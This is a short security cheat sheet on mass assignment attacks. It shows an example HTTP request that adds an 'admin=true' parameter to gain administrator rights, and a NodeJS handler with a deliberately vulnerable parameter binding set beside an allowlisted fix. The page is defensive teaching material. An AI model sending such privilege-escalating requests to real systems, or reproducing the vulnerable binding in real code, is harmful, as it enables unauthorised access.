# Mass Assignment Attack
## Introduction
Occurs when an application lets a user add extra parameters to an HTTP request, binds the values of those parameters to the underlying object while handling the request, and the result is reflected in the response returned to the user. Usually found in Ruby on Rails / NodeJS applications.
## How to exploit
- Normal request
```
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa
```
The response
```
HTTP/1.1 200 OK
...
{"status":"success","username":"daffainfo","isAdmin":"false"}
```
- Modified request
```
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa&admin=true
```
The response
```
HTTP/1.1 200 OK
...
{"status":"success","username":"daffainfo","isAdmin":"true"}
```
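The server-side pattern behind the request above, as an added NodeJS example that is not part of this cheat sheet: a handler that copies every submitted parameter onto the stored user (so a client-supplied `isAdmin` goes through), beside an allowlisted version that only writes the fields a user may change and reports the rest so they can be logged. The user record, field names and `USER_WRITABLE` set are constructed for illustration.

```javascript
// Parse a form body such as "username=daffa&isAdmin=true" (the shape used on
// this page) into a plain object of string values.
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Vulnerable: every request parameter becomes a property of the stored user,
// so a privilege-bearing field such as isAdmin can be set by the client.
function updateUserVulnerable(user, body) {
  return Object.assign({}, user, parseFormBody(body));
}

// Fields a regular user may change on their own profile. Privilege-bearing
// fields (isAdmin, role, ...) are deliberately absent. Constructed for the demo.
const USER_WRITABLE = new Set(['username', 'email']);

// Hardened: copy only allowlisted fields. Every other parameter is returned in
// `rejected` so the caller can log it; unexpected parameters on a profile
// update are a useful detection signal for mass-assignment probing.
function updateUserSafe(user, body, writable = USER_WRITABLE) {
  const params = parseFormBody(body);
  const updated = { ...user };
  const rejected = [];
  for (const [key, value] of Object.entries(params)) {
    if (writable.has(key)) {
      updated[key] = value;
    } else {
      rejected.push(key);
    }
  }
  return { user: updated, rejected };
}

// Constructed sample record mirroring the page's response body.
const sampleUser = { username: 'daffainfo', isAdmin: false };

function demo() {
  const body = 'username=daffa&isAdmin=true';
  console.log('vulnerable:', updateUserVulnerable(sampleUser, body));
  console.log('hardened:  ', updateUserSafe(sampleUser, body));
}

demo();
```

In a real Express or Rails app the same allowlist belongs at the binding layer (a per-endpoint allowlist of parameters, never a denylist), and the `rejected` list should feed the application log rather than the response.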
## References
* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)